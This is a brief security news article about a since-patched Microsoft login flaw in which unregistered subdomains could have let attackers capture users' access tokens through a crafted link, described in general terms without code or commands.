According to web application security specialists, a recently patched vulnerability in Microsoft login system could have been exploited to trick some users into granting hackers full access to their online accounts.
Thanks to the presence of this vulnerability,
threat actors were able to inadvertently extract access tokens, so they could
access victims’ accounts without having to re-enter a password. These tokens
are created by applications or websites and are used instead of usernames and
passwords after users have first authenticated, allowing a permanent connection
to the website and access to third-party web applications without having hand
over their passwords there too.
The web application security experts in charge of the report mention that Microsoft left a security loophole that, if exploited could be used by hackers to redirect these access tokens without the victims being able to notice this malicious activity.
Experts reported dozens of unregistered
subdomains connected to some Microsoft-developed applications, which are highly
reliable and whose associated subdomains can generate access
tokens automatically and without users’ consent. Having these
subdomains, a threat actor only requires tricking the user into clicking on a
specially created link, attached to an email or within a website, to extract
the access token.
Most worryingly, web application security
specialists say this could be achieved with minimal users’ interaction, as a
malicious website could inadvertently trigger a request equivalent to a click
on a link, achieving the theft of the user’s token in the same way.
The good news is that unregistered subdomains
have already been reported to Microsoft, which will prevent their malicious
use. However, experts note that more of these subdomains could still be found.
The report was issued in October and the company fixed the fault about twenty
days later.
Some security flaws had already been found in
the Microsoft login system. Last year, web application security specialists at
the International Institute of Cyber Security (IICS) reported that the company
fixed a security flaw that allowed hackers to alter the records of a Microsoft
subdomain to extract access tokens.
